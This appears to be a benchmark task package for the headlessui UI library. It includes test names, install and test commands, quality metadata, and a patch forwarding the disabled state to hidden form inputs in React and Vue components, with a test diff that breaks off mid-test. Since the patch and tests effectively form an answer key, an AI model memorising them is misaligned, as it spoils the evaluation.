possible to go right when in vertical mode (activation = `auto`)", "should not be possible to go right when in vertical mode (activation = `manual`)", "should be possible to go to the previous item (activation = `auto`)", "should be possible to go to the previous item (activation = `manual`)", "should wrap around at the beginning (activation = `auto`)", "should wrap around at the beginning (activation = `manual`)", "should not be possible to go left when in vertical mode (activation = `auto`)", "should not be possible to go left when in vertical mode (activation = `manual`)", "should not be possible to go down when in horizontal mode (activation = `auto`)", "should not be possible to go down when in horizontal mode (activation = `manual`)", "should be possible to go to the first focusable item (activation = `auto`)", "should be possible to go to the first focusable item (activation = `manual`)", "should be possible to activate the focused tab", "should be possible to click on a tab to focus it", "should be a no-op when clicking on a disabled tab", "should be possible to go to the next item containing a Dialog component", "should error when we are using a <ListboxButton /> without a parent <Listbox />", "should error when we are using a <ListboxLabel /> without a parent <Listbox />", "should error when we are using a <ListboxOptions /> without a parent <Listbox />", "should error when we are using a <ListboxOption /> without a parent <Listbox />", "should be possible to render a Listbox without crashing", "should be possible to render a Listbox using a render prop", "should be possible to disable a Listbox", "should not crash in multiple mode", "null should be a valid value for the Listbox", "should be possible to use the by prop (as a string) with a null initial value", "should be possible to use the by prop (as a string) with a null listbox option", "should be possible to use completely new objects while rendering (single mode)", "should be possible to use 
completely new objects while rendering (multiple mode)", "should be possible to render a ListboxLabel using a render prop", "should be possible to render a ListboxLabel using a render prop and an `as` prop", "should be possible to render a ListboxButton using a render prop", "should be possible to render a ListboxButton using a render prop and an `as` prop", "should be possible to render a ListboxButton and a ListboxLabel and see them linked together", "should be possible to render ListboxOptions using a render prop", "should be possible to always render the ListboxOptions if we provide it a `static` prop", "should be possible to use a different render strategy for the ListboxOptions", "should be possible to render a ListboxOption using a render prop", "should expose the value via the render prop", "should be possible to reset to the default value in multiple mode", "should be possible to swap the Listbox option with a button for example", "should always open the ListboxOptions because of a wrapping OpenClosed component", "should always close the ListboxOptions because of a wrapping OpenClosed component", "should be possible to open the listbox with Enter", "should not be possible to open the listbox with Enter when the button is disabled", "should be possible to open the listbox with Enter, and focus the selected option", "should be possible to open the listbox with Enter, and focus the selected option (when using the `hidden` render strategy)", "should be possible to open the listbox with Enter, and focus the selected option (with a list of objects)", "should have no active listbox option when there are no listbox options at all", "should focus the first non disabled listbox option when opening with Enter", "should focus the first non disabled listbox option when opening with Enter (jump over multiple disabled ones)", "should have no active listbox option upon Enter key press, when there are no non-disabled listbox options", "should be possible to close the 
listbox with Enter when there is no active listboxoption", "should be possible to close the listbox with Enter and choose the active listbox option", "should be possible to open the listbox with Space", "should not be possible to open the listbox with Space when the button is disabled", "should be possible to open the listbox with Space, and focus the selected option", "should focus the first non disabled listbox option when opening with Space", "should focus the first non disabled listbox option when opening with Space (jump over multiple disabled ones)", "should have no active listbox option upon Space key press, when there are no non-disabled listbox options", "should be possible to close the listbox with Space and choose the active listbox option", "should be possible to close an open listbox with Escape", "should focus trap when we use Tab", "should be possible to open the listbox with ArrowDown", "should not be possible to open the listbox with ArrowDown when the button is disabled", "should be possible to open the listbox with ArrowDown, and focus the selected option", "should be possible to use ArrowDown to navigate the listbox options", "should be possible to use ArrowDown to navigate the listbox options and skip the first disabled one", "should be possible to use ArrowDown to navigate the listbox options and jump to the first non-disabled one", "should be possible to use ArrowRight to navigate the listbox options", "should be possible to open the listbox with ArrowUp and the last option should be active", "should not be possible to open the listbox with ArrowUp and the last option should be active when the button is disabled", "should be possible to open the listbox with ArrowUp, and focus the selected option", "should be possible to use ArrowUp to navigate the listbox options and jump to the first non-disabled one", "should not be possible to navigate up or down if there is only a single non-disabled option", "should be possible to use ArrowUp to 
navigate the listbox options", "should be possible to use ArrowLeft to navigate the listbox options", "should be possible to use the End key to go to the last listbox option", "should be possible to use the End key to go to the last non disabled listbox option", "should be possible to use the End key to go to the first listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon End key press, when there are no non-disabled listbox options", "should be possible to use the PageDown key to go to the last listbox option", "should be possible to use the PageDown key to go to the last non disabled listbox option", "should be possible to use the PageDown key to go to the first listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon PageDown key press, when there are no non-disabled listbox options", "should be possible to use the Home key to go to the first listbox option", "should be possible to use the Home key to go to the first non disabled listbox option", "should be possible to use the Home key to go to the last listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon Home key press, when there are no non-disabled listbox options", "should be possible to use the PageUp key to go to the first listbox option", "should be possible to use the PageUp key to go to the first non disabled listbox option", "should be possible to use the PageUp key to go to the last listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon PageUp key press, when there are no non-disabled listbox options", "should not be possible to search for a disabled option", "should focus the ListboxButton when we click the ListboxLabel", "should not focus the ListboxButton when we right click the ListboxLabel", "should be possible to open the listbox on click", "should not be possible to open the listbox on 
right click", "should not be possible to open the listbox on click when the button is disabled", "should be possible to open the listbox on click, and focus the selected option", "should be possible to close a listbox on click", "should be a no-op when we click outside of a closed listbox", "should be possible to click outside of the listbox which should close the listbox", "should be possible to click outside of the listbox on another listbox button which should close the current listbox and open the new listbox", "should be possible to click outside of the listbox which should close the listbox (even if we press the listbox button)", "should be possible to hover an option and make it active", "should make a listbox option active when you move the mouse over it", "should be a no-op when we move the mouse and the listbox option is already active", "should be a no-op when we move the mouse and the listbox option is disabled", "should not be possible to hover an option that is disabled", "should be possible to mouse leave an option and make it inactive", "should be possible to mouse leave a disabled option and be a no-op", "should be possible to click a listbox option, which closes the listbox", "should be possible to click a disabled listbox option, which is a no-op", "should be possible focus a listbox option, so that it becomes active", "should not be possible to focus a listbox option which is disabled", "should be possible to pass multiple values to the Listbox component", "should make the first selected option the active item", "should keep the listbox open when selecting an item via the keyboard", "should toggle the selected state of an option when clicking on it", "should toggle the selected state of an option when clicking on it (using objects instead of primitives)", "should yell at us when we forget to wrap the `<TransitionChild />` in a parent <Transition /> component", "should be possible to render a TransitionChild without children", "should be possible 
to change the underlying DOM tag of the TransitionChild components", "should be possible to change the underlying DOM tag of the Transition component and TransitionChild components", "should be possible to use render props on the TransitionChild components", "should be possible to use render props on the Transition and TransitionChild components", "should yell at us when we forgot to forward the ref on one of the TransitionChild components", "should transition out completely", "should fire events for all the stages", "should trigger the `onChange` when the tab changes", "should error when we are using a <Tab.List /> without a parent <Tab.Group /> component", "should error when we are using a <Tab /> without a parent <Tab.Group /> component", "should error when we are using a <Tab.Panels /> without a parent <Tab.Group /> component", "should error when we are using a <Tab.Panel /> without a parent <Tab.Group /> component", "should be possible to render Tab.Group without crashing", "should be possible to render the Tab.Panels first, then the Tab.List", "should be possible to render using as={Fragment}", "should be possible to render using multiple as={Fragment}", "should expose the `selectedIndex` on the `Tab.Group` component", "should expose the `selectedIndex` on the `Tab.List` component", "should expose the `selectedIndex` on the `Tab.Panels` component", "should expose the `selected` state on the `Tab.Panel` components", "should not change the tab in a controlled component if you do not respond to the onChange", "should error when we are using a <Listbox.Button /> without a parent <Listbox />", "should error when we are using a <Listbox.Label /> without a parent <Listbox />", "should error when we are using a <Listbox.Options /> without a parent <Listbox />", "should error when we are using a <Listbox.Option /> without a parent <Listbox />", "should be possible to render a Listbox.Label using a render prop", "should be possible to render a Listbox.Label using a 
render prop and an `as` prop", "should be possible to render a Listbox.Button using a render prop", "should be possible to render a Listbox.Button using a render prop and an `as` prop", "should be possible to render a Listbox.Button and a Listbox.Label and see them linked together", "should be possible to render Listbox.Options using a render prop", "should be possible to always render the Listbox.Options if we provide it a `static` prop", "should be possible to use a different render strategy for the Listbox.Options", "should be possible to render a Listbox.Option using a render prop", "should be possible to wrap the Listbox.Options with a Transition component", "should focus the Listbox.Button when we click the Listbox.Label", "should not focus the Listbox.Button when we right click the Listbox.Label", "should be possible to click outside of the listbox, on an element which is within a focusable element, which closes the listbox", "should error when we are using a <Combobox.Button /> without a parent <Combobox />", "should error when we are using a <Combobox.Label /> without a parent <Combobox />", "should error when we are using a <Combobox.Options /> without a parent <Combobox />", "should error when we are using a <Combobox.Option /> without a parent <Combobox />", "should be possible to render a Combobox without crashing", "should guarantee the order of options based on `order` when performing actions", "should be possible to render a Combobox using a render prop", "should be possible to disable a Combobox", "should not crash when a defaultValue is not given", "should close the Combobox when the input is blurred", "selecting an option puts the value into Combobox.Input when displayValue is not provided", "selecting an option puts the display value into Combobox.Input when displayValue is provided", "selecting an option puts the display value into Combobox.Input when displayValue is provided (when value is undefined)", "conditionally rendering the input should 
allow changing the display value", "should be possible to override the `type` on the input", "should move the caret to the end of the input when syncing the value", "should be possible to render a Combobox.Label using a render prop", "should be possible to link Input/Button and Label if Label is rendered last", "should be possible to render a Combobox.Label using a render prop and an `as` prop", "should be possible to render a Combobox.Button using a render prop", "should be possible to render a Combobox.Button using a render prop and an `as` prop", "should be possible to render a Combobox.Button and a Combobox.Label and see them linked together", "should be possible to render Combobox.Options using a render prop", "should be possible to always render the Combobox.Options if we provide it a `static` prop", "should be possible to use a different render strategy for the Combobox.Options", "should be possible to render a Combobox.Option using a render prop", "should be possible to swap the Combobox option with a button for example", "should mark all the elements between Combobox.Options and Combobox.Option with role none", "should be possible to wrap the Combobox.Options with a Transition component", "should be possible to open the combobox with Enter", "should not be possible to open the combobox with Enter when the button is disabled", "should be possible to open the combobox with Enter, and focus the selected option", "should be possible to open the combobox with Enter, and focus the selected option (when using the `hidden` render strategy)", "should be possible to open the combobox with Enter, and focus the selected option (with a list of objects)", "should have no active combobox option when there are no combobox options at all", "should be possible to open the combobox with Space", "should not be possible to open the combobox with Space when the button is disabled", "should be possible to open the combobox with Space, and focus the selected option", "should have 
no active combobox option upon Space key press, when there are no non-disabled combobox options", "should be possible to close an open combobox with Escape", "should not propagate the Escape event when the combobox is open", "should propagate the Escape event when the combobox is closed", "should be possible to open the combobox with ArrowDown", "should not be possible to open the combobox with ArrowDown when the button is disabled", "should be possible to open the combobox with ArrowDown, and focus the selected option", "should be possible to open the combobox with ArrowUp and the last option should be active", "should not be possible to open the combobox with ArrowUp and the last option should be active when the button is disabled", "should be possible to open the combobox with ArrowUp, and focus the selected option", "should be possible to use ArrowUp to navigate the combobox options and jump to the first non-disabled one", "should be possible to close the combobox with Enter and choose the active combobox option", "pressing Tab should select the active item and move to the next DOM node", "pressing Shift+Tab should select the active item and move to the previous DOM node", "should bubble escape when using `static` on Combobox.Options", "should bubble escape when not using Combobox.Options at all", "should sync the input field correctly and reset it when pressing Escape", "should be possible to use ArrowDown to navigate the combobox options", "should be possible to use ArrowDown to navigate the combobox options and skip the first disabled one", "should be possible to use ArrowDown to navigate the combobox options and jump to the first non-disabled one", "should be possible to go to the next item if no value is set", "should be possible to use ArrowUp to navigate the combobox options", "should be possible to use the End key to go to the last combobox option", "should be possible to use the End key to go to the last non disabled combobox option", "should be 
possible to use the End key to go to the first combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon End key press, when there are no non-disabled combobox options", "should be possible to use the PageDown key to go to the last combobox option", "should be possible to use the PageDown key to go to the last non disabled combobox option", "should be possible to use the PageDown key to go to the first combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon PageDown key press, when there are no non-disabled combobox options", "should be possible to use the Home key to go to the first combobox option", "should be possible to use the Home key to go to the first non disabled combobox option", "should be possible to use the Home key to go to the last combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon Home key press, when there are no non-disabled combobox options", "should be possible to use the PageUp key to go to the first combobox option", "should be possible to use the PageUp key to go to the first non disabled combobox option", "should be possible to use the PageUp key to go to the last combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon PageUp key press, when there are no non-disabled combobox options", "should reset the value when the last character is removed, when in `nullable` mode", "should not be possible to search and activate a disabled option", "should maintain activeIndex and activeOption when filtering", "should focus the Combobox.Input when we click the Combobox.Label", "should not focus the Combobox.Input when we right click the Combobox.Label", "should be possible to open the combobox by focusing the input with immediate mode enabled", "should not be possible to open the combobox by focusing the input with immediate mode 
disabled", "should not be possible to open the combobox by focusing the input with immediate mode enabled when button is disabled", "should be possible to close a combobox on click with immediate mode enabled", "should be possible to close a focused combobox on click with immediate mode enabled", "should be possible to open the combobox on click", "should not be possible to open the combobox on right click", "should not be possible to open the combobox on click when the button is disabled", "should be possible to open the combobox on click, and focus the selected option", "should be possible to close a combobox on click", "should be a no-op when we click outside of a closed combobox", "should be possible to click outside of the combobox on another combobox button which should close the current combobox and open the new combobox", "should be possible to click outside of the combobox which should close the combobox (even if we press the combobox button)", "should be possible to click outside of the combobox, on an element which is within a focusable element, which closes the combobox", "should be possible to hover an option and make it active when using `static`", "should make a combobox option active when you move the mouse over it", "should be a no-op when we move the mouse and the combobox option is already active", "should be a no-op when we move the mouse and the combobox option is disabled", "should be possible to click a combobox option, which closes the combobox", "should be possible to click a combobox option, which closes the combobox with immediate mode enabled", "should be possible to click a disabled combobox option, which is a no-op", "should be possible focus a combobox option, so that it becomes active", "should not be possible to focus a combobox option which is disabled", "should be possible to hold the last active option", "should sync the input field correctly and reset it when resetting the value from outside (to null)", "should warn when 
changing the combobox from uncontrolled to controlled", "should warn when changing the combobox from controlled to uncontrolled", "should sync the input field correctly and reset it when resetting the value from outside (when using displayValue)", "should be possible to pass multiple values to the Combobox component", "should keep the combobox open when selecting an item via the keyboard", "should reset the active option, if the active option gets unmounted", "should error when we are using a <ComboboxButton /> without a parent <Combobox />", "should error when we are using a <ComboboxLabel /> without a parent <Combobox />", "should error when we are using a <ComboboxOptions /> without a parent <Combobox />", "should error when we are using a <ComboboxOption /> without a parent <Combobox />", "selecting an option puts the display value into Combobox.Input when displayValue is provided (when v-model is undefined)", "should be possible to render a ComboboxLabel using a render prop", "should be possible to render a ComboboxLabel using a render prop and an `as` prop", "should be possible to render a ComboboxButton using a render prop", "should be possible to render a ComboboxButton using a render prop and an `as` prop", "should be possible to render a ComboboxButton and a ComboboxLabel and see them linked together", "should be possible to render ComboboxOptions using a render prop", "should be possible to always render the ComboboxOptions if we provide it a `static` prop", "should be possible to use a different render strategy for the ComboboxOptions", "should be possible to render a ComboboxOption using a render prop", "should always open the ComboboxOptions because of a wrapping OpenClosed component", "should always close the ComboboxOptions because of a wrapping OpenClosed component", "should sync the active index properly", "should be possible to open the Combobox with Enter", "should be possible to use the PageDown key to go to the last non disabled Combobox 
option", "should focus the ComboboxButton when we click the ComboboxLabel", "should not focus the ComboboxInput when we right click the ComboboxLabel", "should sync the input field correctly and reset it when resetting the value from outside (to undefined)" ]
Method: Switch<TTag extends ElementType = typeof DEFAULT_SWITCH_TAG>(props: SwitchProps<TTag> & { tabIndex?: number }) Location: packages/@headlessui-react/src/components/switch/switch.tsx Inputs: - tabIndex?: number – optional numeric prop; defaults to 0. If the caller provides -1 the component coerces it to 0 to keep the element focusable. Outputs: - Renders a button‑like element with `role="switch"` and a `tabindex` attribute whose value is the provided tabIndex (or 0 when omitted or when -1 is supplied). The component remains keyboard‑focusable and integrates with the existing Switch accessibility API. Method: Switch (Vue component) – props object includes `tabIndex?: number` Location: packages/@headlessui-vue/src/components/switch/switch.ts Inputs: - tabIndex?: number – optional numeric prop; default 0. When passed -1 the component treats it as 0. Outputs: - Returns a render function that produces an element with `role="switch"` and a `tabindex` attribute reflecting the effective tabIndex (≥ 0). This prop allows callers to customise tab order while ensuring the switch stays focusable.
MIT
{ "base_image_name": "node_20", "install": [ "npm ci --prefer-offline --no-audit --progress=false" ], "log_parser": "parse_log_js_4", "test_cmd": "npm test -- --verbose --no-colors" }
{ "num_modified_files": 4, "num_modified_lines": 8, "pr_author": "RobinMalfait", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.98, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/tailwindlabs/headlessui/pull/2966" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests that the Switch component accept a custom `tabIndex` prop, default to 0, and ignore a value of -1. The added tests check the default, an overridden positive value, and the handling of -1, matching the described behavior. Tests only verify the new prop and do not impose unrelated expectations, and the issue provides clear acceptance criteria, so it is a clean, solvable task.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, 
"test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
08baf094d22810e113514dec6bf9a05133353757
2024-02-21 13:08:31
vercel[bot]: [vc]: #XFMtm9bVIaVWoByZM1t5TdWDXTP4a4CGwywr3CEXsxs=:eyJpc01vbm9yZXBvIjp0cnVlLCJ0eXBlIjoiZ2l0aHViIiwicHJvamVjdHMiOlt7Im5hbWUiOiJoZWFkbGVzc3VpLXJlYWN0Iiwicm9vdERpcmVjdG9yeSI6InBsYXlncm91bmRzL3JlYWN0IiwiaW5zcGVjdG9yVXJsIjoiaHR0cHM6Ly92ZXJjZWwuY29tL3RhaWx3aW5kbGFicy9oZWFkbGVzc3VpLXJlYWN0L0ZON2VGMVd0bTE3djc4eHhoWFhFQ1hiZHlTQkYiLCJwcmV2aWV3VXJsIjoiaGVhZGxlc3N1aS1yZWFjdC1naXQtZml4LWlzc3VlLTI5ODgtdGFpbHdpbmRsYWJzLnZlcmNlbC5hcHAiLCJuZXh0Q29tbWl0U3RhdHVzIjoiUEVORElORyIsImxpdmVGZWVkYmFjayI6eyJyZXNvbHZlZCI6MCwidW5yZXNvbHZlZCI6MCwidG90YWwiOjAsImxpbmsiOiJoZWFkbGVzc3VpLXJlYWN0LWdpdC1maXgtaXNzdWUtMjk4OC10YWlsd2luZGxhYnMudmVyY2VsLmFwcCJ9fSx7Im5hbWUiOiJoZWFkbGVzc3VpLXZ1ZSIsInJvb3REaXJlY3RvcnkiOiJwbGF5Z3JvdW5kcy92dWUiLCJpbnNwZWN0b3JVcmwiOiJodHRwczovL3ZlcmNlbC5jb20vdGFpbHdpbmRsYWJzL2hlYWRsZXNzdWktdnVlLzh4M1VOWVFlS3BGa2VHajl5ZktlanlBVzZwRmQiLCJwcmV2aWV3VXJsIjoiaGVhZGxlc3N1aS12dWUtZ2l0LWZpeC1pc3N1ZS0yOTg4LXRhaWx3aW5kbGFicy52ZXJjZWwuYXBwIiwibmV4dENvbW1pdFN0YXR1cyI6IlBFTkRJTkciLCJsaXZlRmVlZGJhY2siOnsicmVzb2x2ZWQiOjAsInVucmVzb2x2ZWQiOjAsInRvdGFsIjowLCJsaW5rIjoiaGVhZGxlc3N1aS12dWUtZ2l0LWZpeC1pc3N1ZS0yOTg4LXRhaWx3aW5kbGFicy52ZXJjZWwuYXBwIn19XX0= **The latest updates on your projects**. 
Learn more about [Vercel for Git ↗︎](https://vercel.link/github-learn-more) | Name | Status | Preview | Comments | Updated (UTC) | | :--- | :----- | :------ | :------- | :------ | | **headlessui-react** | 🔄 Building ([Inspect](https://vercel.com/tailwindlabs/headlessui-react/FN7eF1Wtm17v78xxhXXECXbdySBF)) | [Visit Preview](https://vercel.live/open-feedback/headlessui-react-git-fix-issue-2988-tailwindlabs.vercel.app?via=pr-comment-visit-preview-link&passThrough=1) | 💬 [**Add feedback**](https://vercel.live/open-feedback/headlessui-react-git-fix-issue-2988-tailwindlabs.vercel.app?via=pr-comment-feedback-link) | Feb 21, 2024 1:08pm | | **headlessui-vue** | 🔄 Building ([Inspect](https://vercel.com/tailwindlabs/headlessui-vue/8x3UNYQeKpFkeGj9yfKejyAW6pFd)) | [Visit Preview](https://vercel.live/open-feedback/headlessui-vue-git-fix-issue-2988-tailwindlabs.vercel.app?via=pr-comment-visit-preview-link&passThrough=1) | 💬 [**Add feedback**](https://vercel.live/open-feedback/headlessui-vue-git-fix-issue-2988-tailwindlabs.vercel.app?via=pr-comment-feedback-link) | Feb 21, 2024 1:08pm |
tailwindlabs__headlessui-3004
diff --git a/packages/@headlessui-react/CHANGELOG.md b/packages/@headlessui-react/CHANGELOG.md index 14cc2f7..1035c32 100644 --- a/packages/@headlessui-react/CHANGELOG.md +++ b/packages/@headlessui-react/CHANGELOG.md @@ -16,6 +16,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 - Add `hidden` attribute to internal `<Hidden />` component when the `Features.Hidden` feature is used ([#2955](https://github.com/tailwindlabs/headlessui/pull/2955)) - Attempt form submission when pressing `Enter` on `Checkbox` component ([#2962](https://github.com/tailwindlabs/headlessui/pull/2962)) - Allow setting custom `tabIndex` on the `<Switch />` component ([#2966](https://github.com/tailwindlabs/headlessui/pull/2966)) +- Forward `disabled` state to hidden inputs in form-like components ([#3004](https://github.com/tailwindlabs/headlessui/pull/3004)) ### Changed diff --git a/packages/@headlessui-react/src/components/checkbox/checkbox.tsx b/packages/@headlessui-react/src/components/checkbox/checkbox.tsx index aaa7ad2..c67e965 100644 --- a/packages/@headlessui-react/src/components/checkbox/checkbox.tsx +++ b/packages/@headlessui-react/src/components/checkbox/checkbox.tsx @@ -173,7 +173,12 @@ function CheckboxFn<TTag extends ElementType = typeof DEFAULT_CHECKBOX_TAG, TTyp return ( <> {name != null && ( - <FormFields data={checked ? { [name]: value || 'on' } : {}} form={form} onReset={reset} /> + <FormFields + disabled={disabled} + data={checked ? 
{ [name]: value || 'on' } : {}} + form={form} + onReset={reset} + /> )} {render({ ourProps, diff --git a/packages/@headlessui-react/src/components/combobox/combobox.tsx b/packages/@headlessui-react/src/components/combobox/combobox.tsx index 8bfd8a7..7971322 100644 --- a/packages/@headlessui-react/src/components/combobox/combobox.tsx +++ b/packages/@headlessui-react/src/components/combobox/combobox.tsx @@ -907,6 +907,7 @@ function ComboboxFn<TValue, TTag extends ElementType = typeof DEFAULT_COMBOBOX_T > {name != null && ( <FormFields + disabled={disabled} data={value != null ? { [name]: value } : {}} form={form} onReset={reset} diff --git a/packages/@headlessui-react/src/components/listbox/listbox.tsx b/packages/@headlessui-react/src/components/listbox/listbox.tsx index 63f26e3..129dd74 100644 --- a/packages/@headlessui-react/src/components/listbox/listbox.tsx +++ b/packages/@headlessui-react/src/components/listbox/listbox.tsx @@ -670,7 +670,12 @@ function ListboxFn< })} > {name != null && value != null && ( - <FormFields data={{ [name]: value }} form={form} onReset={reset} /> + <FormFields + disabled={disabled} + data={{ [name]: value }} + form={form} + onReset={reset} + /> )} {render({ ourProps, diff --git a/packages/@headlessui-react/src/components/radio-group/radio-group.tsx b/packages/@headlessui-react/src/components/radio-group/radio-group.tsx index 2ab3a7a..2fabaa2 100644 --- a/packages/@headlessui-react/src/components/radio-group/radio-group.tsx +++ b/packages/@headlessui-react/src/components/radio-group/radio-group.tsx @@ -314,6 +314,7 @@ function RadioGroupFn<TTag extends ElementType = typeof DEFAULT_RADIO_GROUP_TAG, <RadioGroupDataContext.Provider value={radioGroupData}> {name != null && ( <FormFields + disabled={disabled} data={value != null ? 
{ [name]: value || 'on' } : {}} form={form} onReset={reset} diff --git a/packages/@headlessui-react/src/components/switch/switch.tsx b/packages/@headlessui-react/src/components/switch/switch.tsx index 76a4ab8..eedf7a9 100644 --- a/packages/@headlessui-react/src/components/switch/switch.tsx +++ b/packages/@headlessui-react/src/components/switch/switch.tsx @@ -237,7 +237,12 @@ function SwitchFn<TTag extends ElementType = typeof DEFAULT_SWITCH_TAG>( return ( <> {name != null && ( - <FormFields data={checked ? { [name]: value || 'on' } : {}} form={form} onReset={reset} /> + <FormFields + disabled={disabled} + data={checked ? { [name]: value || 'on' } : {}} + form={form} + onReset={reset} + /> )} {render({ ourProps, theirProps, slot, defaultTag: DEFAULT_SWITCH_TAG, name: 'Switch' })} </> diff --git a/packages/@headlessui-react/src/internal/form-fields.tsx b/packages/@headlessui-react/src/internal/form-fields.tsx index 3592c57..ab94d98 100644 --- a/packages/@headlessui-react/src/internal/form-fields.tsx +++ b/packages/@headlessui-react/src/internal/form-fields.tsx @@ -31,10 +31,12 @@ export function HoistFormFields({ children }: React.PropsWithChildren<{}>) { export function FormFields({ data, form: formId, + disabled, onReset, }: { data: Record<string, any> form?: string + disabled?: boolean onReset?: (e: Event) => void }) { let [form, setForm] = useState<HTMLFormElement | null>(null) @@ -61,6 +63,7 @@ export function FormFields({ hidden: true, readOnly: true, form: formId, + disabled, name, value, })} diff --git a/packages/@headlessui-vue/CHANGELOG.md b/packages/@headlessui-vue/CHANGELOG.md index 25b14de..044bbd1 100644 --- a/packages/@headlessui-vue/CHANGELOG.md +++ b/packages/@headlessui-vue/CHANGELOG.md @@ -19,6 +19,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 - Don’t override explicit `disabled` prop for components inside `<MenuItem>` ([#2929](https://github.com/tailwindlabs/headlessui/pull/2929)) - Add `hidden` attribute to 
internal `<Hidden />` component when the `Features.Hidden` feature is used ([#2955](https://github.com/tailwindlabs/headlessui/pull/2955)) - Allow setting custom `tabIndex` on the `<Switch />` component ([#2966](https://github.com/tailwindlabs/headlessui/pull/2966)) +- Forward `disabled` state to hidden inputs in form-like components ([#3004](https://github.com/tailwindlabs/headlessui/pull/3004)) ## [1.7.19] - 2024-02-07 diff --git a/packages/@headlessui-vue/src/components/combobox/combobox.ts b/packages/@headlessui-vue/src/components/combobox/combobox.ts index 238c92e..e3e4cc3 100644 --- a/packages/@headlessui-vue/src/components/combobox/combobox.ts +++ b/packages/@headlessui-vue/src/components/combobox/combobox.ts @@ -735,6 +735,7 @@ export let Combobox = defineComponent({ hidden: true, readOnly: true, form, + disabled, name, value, }) diff --git a/packages/@headlessui-vue/src/components/listbox/listbox.ts b/packages/@headlessui-vue/src/components/listbox/listbox.ts index f49c438..20b1ce7 100644 --- a/packages/@headlessui-vue/src/components/listbox/listbox.ts +++ b/packages/@headlessui-vue/src/components/listbox/listbox.ts @@ -392,6 +392,7 @@ export let Listbox = defineComponent({ hidden: true, readOnly: true, form, + disabled, name, value, }) diff --git a/packages/@headlessui-vue/src/components/radio-group/radio-group.ts b/packages/@headlessui-vue/src/components/radio-group/radio-group.ts index 9bf8417..cd63c39 100644 --- a/packages/@headlessui-vue/src/components/radio-group/radio-group.ts +++ b/packages/@headlessui-vue/src/components/radio-group/radio-group.ts @@ -262,6 +262,7 @@ export let RadioGroup = defineComponent({ hidden: true, readOnly: true, form, + disabled, name, value, }) diff --git a/packages/@headlessui-vue/src/components/switch/switch.ts b/packages/@headlessui-vue/src/components/switch/switch.ts index 4746dee..239e0df 100644 --- a/packages/@headlessui-vue/src/components/switch/switch.ts +++ 
b/packages/@headlessui-vue/src/components/switch/switch.ts @@ -78,6 +78,7 @@ export let Switch = defineComponent({ name: { type: String, optional: true }, value: { type: String, optional: true }, id: { type: String, default: () => `headlessui-switch-${useId()}` }, + disabled: { type: Boolean, default: false }, tabIndex: { type: Number, default: 0 }, }, inheritAttrs: false, @@ -172,6 +173,7 @@ export let Switch = defineComponent({ readOnly: true, checked: checked.value, form, + disabled: theirProps.disabled, name, value, })
Forward `disabled` state to hidden inputs in form-like components This PR fixes an issue where form-like components are disabled then the hidden input fields should be disabled as well otherwise they will be submitted to the form. We will now forward the `disabled` state to the hidden inputs. Fixes: #2988
**Title** Forward disabled state to hidden inputs in form‑like components **Problem** When a form‑like component (checkbox, combobox, listbox, radio group, switch) is disabled, its internally rendered hidden input remains enabled and is submitted with the form. This contradicts the expected HTML behavior where disabled fields are excluded from submission. **Root Cause** The hidden inputs were generated without considering the component’s `disabled` prop, so they were never disabled even when their parent component was. **Fix / Expected Behavior** - Propagate the component’s `disabled` flag to the hidden input elements. - Disabled components no longer contribute their values during form submission. - The form‑field helper now accepts and forwards a `disabled` option to the hidden inputs. - Behavior for enabled components remains unchanged. - Changes are applied consistently across both React and Vue implementations. **Risk & Validation** - Verify that disabling a component does not affect other attributes (e.g., `readOnly`, `hidden`). - Add tests to ensure hidden inputs are omitted from the submitted payload when disabled. - Run the full test suite and perform manual form submissions across supported browsers to confirm correct behavior.
3,004
tailwindlabs/headlessui
diff --git a/packages/@headlessui-react/src/components/combobox/combobox.test.tsx b/packages/@headlessui-react/src/components/combobox/combobox.test.tsx index 525f345..562a33e 100644 --- a/packages/@headlessui-react/src/components/combobox/combobox.test.tsx +++ b/packages/@headlessui-react/src/components/combobox/combobox.test.tsx @@ -5747,6 +5747,48 @@ describe('Form compatibility', () => { expect(submits).toHaveBeenLastCalledWith([['delivery', 'pickup']]) }) + it('should not submit the data if the Combobox is disabled', async () => { + let submits = jest.fn() + + function Example() { + let [value, setValue] = useState('home-delivery') + return ( + <form + onSubmit={(event) => { + event.preventDefault() + submits([...new FormData(event.currentTarget).entries()]) + }} + > + <input type="hidden" name="foo" value="bar" /> + <Combobox value={value} onChange={setValue} name="delivery" disabled> + <Combobox.Input onChange={NOOP} /> + <Combobox.Button>Trigger</Combobox.Button> + <Combobox.Label>Pizza Delivery</Combobox.Label> + <Combobox.Options> + <Combobox.Option value="pickup">Pickup</Combobox.Option> + <Combobox.Option value="home-delivery">Home delivery</Combobox.Option> + <Combobox.Option value="dine-in">Dine in</Combobox.Option> + </Combobox.Options> + </Combobox> + <button>Submit</button> + </form> + ) + } + + render(<Example />) + + // Open combobox + await click(getComboboxButton()) + + // 